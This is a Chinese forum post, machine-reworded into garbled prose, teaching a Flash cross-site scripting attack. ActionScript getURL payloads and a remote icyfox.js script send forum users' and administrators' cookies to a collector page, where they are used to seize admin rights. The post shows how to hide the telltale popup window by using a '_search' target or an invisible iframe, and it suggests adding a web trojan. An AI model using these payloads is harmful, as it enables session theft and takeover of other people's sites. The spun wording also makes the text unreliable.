|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
ActionScript是一种程序语言的简单文本文件.FLA档案能够直接包含ActionScript。
前些天一向忙着进修WIN32汇编,一向懒得写文章,这些天来仿佛Flash跨站打击闹的挺凶的,但在实行Flash跨站打击时的谁人弹出的IE窗口很简单引发他人的嫌疑,而使得Flash跨站打击失利,这切实其实让人几有摇头疼,人人是否是也一向在寻觅实行Flash跨站打击时不弹出IE窗口的办法来埋没本人的打击举动呢?上面人人和我一同来办理这个不年夜不小的成绩,让Flash跨站打击更完善吧!
一样平常来讲人人在举行Flash跨站打击时都是本人做一个Flash动画,并在第一帧中到场用于跳转到其他URL的AtionScript剧本函数,以下:
getURL("BLOCKEDSCRIPTwindow.open(’http://用于搜集Cookie的网页地点?’+documentcookie)","_self")然后把这个Flash动画置于论坛中的署名、贴子或短信动静中,用来取得办理员或用户的Cookie,从而失掉办理权限,进一步乘机把持全部站点,终极到达本人的目标。我们能够看到在全部跨站打击中最主要的就是这个AtionScript剧本啦!也就是这个剧本顶用到的代码翻开了一个我们又爱又恨的窗口,以是我们也只能从改革这个剧本代码来完成埋没大概是往失落弹出的IE窗口,除别的别无它法!
我们先剖析一下下面的AtionScript剧本,它利用AtionScript剧本函数"getURL"跳转到一个利用JavaScript协定的URL(JavaScript协定前面就是我们十分熟习的JavaScript剧本代码),在JavaScript中利用document.cookie的到Cookie,并把Cookie和一个用于搜集Cookie的网页地点连成一个http协定的URL地点,最初利用window.open翻开分解的URL地点,从而把Cookie用GET体例发送到用于搜集Cookie的网页,并纪录上去。
经由过程下面的剖析我们进一步懂得谁人弹出的IE窗口是因为JavaScript协定中的代码window.open所天生的,信任人人都晓得window.open的第二个参数用来指定翻开的窗口的名字,其通用称号有"_media(IE6.0在扫瞄器右边的媒面子板内翻开)"、"_blank(在新窗口中翻开)"、"_parent(在以后框架的父框架内翻开。假设以后框架无父框架,此参数值同等于_self)"、"_search(IE5.0在扫瞄器右边的搜刮面板内翻开)"、"_self(在以后窗口中翻开,掩盖以后文档)"、"_top(在一切框架以外的最顶层窗口中翻开。假设以后窗口无框架布局,此参数值同等于_self)"等几种,假如我们以"_search"来翻开窗口,不是就没有了弹出的IE窗口了吗?AtionScript剧本改成:
getURL("BLOCKEDSCRIPTwindow.open(’http://用于搜集Cookie的网页地点?’+documentcookie,’_search’)","_self")固然,如许做会翻开搜刮面板,也会引发嫌疑,但却能够躲过那些封闭弹出窗口软件的追杀!临时也算一种办法吧!
假如仅仅是下面所说的,信任很多读者要把我。。。。。。
看到这里伶俐的你是否是想到了点办理的思绪?对!既然撑持JavaScript啦,另有啥东东会不克不及办理呢?JavaScript真的是优点多多呀!
假如你曾看了我的那篇"打造一个完善的IE网页木马"的文章,而且你对个中的代码深深了解的话,你能够本人先往设想一下啦!
在那篇文章中有上面如许一段代码:
jsurl="http://www.godog.y365.com/wodemuma/icyfox.js".replace(///g,’//’);
window.open("file:BLOCKEDSCRIPTdocument.all.tags(’SCRIPT’)[0].src=’"+jsurl+"’;eval();","icyfoxlovelace");利用了javascript协定把本人网站上的一个js代码文件拔出到了当地文件中,一样的事理我们也能够用它把一个js代码文件拔出到举行跨站打击的论坛网页中,响应的AtionScript剧本改成:
getURL("BLOCKEDSCRIPTdocument.all.tags(’SCRIPT’)[0].src=’http://www.godog.y365.com/wodemuma/icyfox.js’;eval();","_self")个中icyfox.js得内容以下:
cookieurl="http://用于搜集Cookie的网页地点?cookie="+escape(document.cookie);/*这里利用了escape()对cookie编码,用来避免cookie中的一些特别字符*/
document.body.insertAdjacentHTML(beforeEnd,<iframeWIDTH=0pxHEIGHT=0pxstyle="display:none;"src="+cookieurl+"></iframe>);
/*这里利用了insertAdjacentHTML在body的最初拔出了一个不成见的框架*/
这里次要是使用了能够在一个网页中引进分歧域中的javascript代码文档,并且所引进的javascript代码文档会和本网页融为一体的特性!
好啦!至此Flash跨站打击弹出IE窗口的成绩算是办理啦!固然假如你乐意,在icyfox.js中加个网页木马之类的我也无话可说!
最初我再特地说一句,它一样能够用于在其他范例的跨站剧本功击中埋没弹出的IE窗口!比起使用Microsoft.XMLHTTP控件发送COOKIE要随便的多,由于它不会像Microsoft.XMLHTTP控件那样只能发给以后服务器,另有核心上czy的"使用Microsoft.XMLHTTP控件发送COOKIE"一文中提到如许一句话:
"之前我想了一个在网页顶用insertAdjacentHTML办法来注进HTML语句的举措委曲能够作到发送COOKIE不呈现IE窗口,可是在实践利用中偶然会碰到IE堕落。"
具我剖析是由于在COOKIE中存在了一些特别字符,而czy没有准确处置或是编码,才会在实践利用中偶然会碰到IE堕落,以是下面代码我用了escape()对cookie编码,在承受到cookie后请注重用unescape()来解码!
网页设计者使用Flash创作出既漂亮又可改变尺寸的导航界面以及其他奇特的效果。Flash的前身是FutureWave公司的FutureSplash,是世界上第一个商用的二维矢量动画软件。 |
|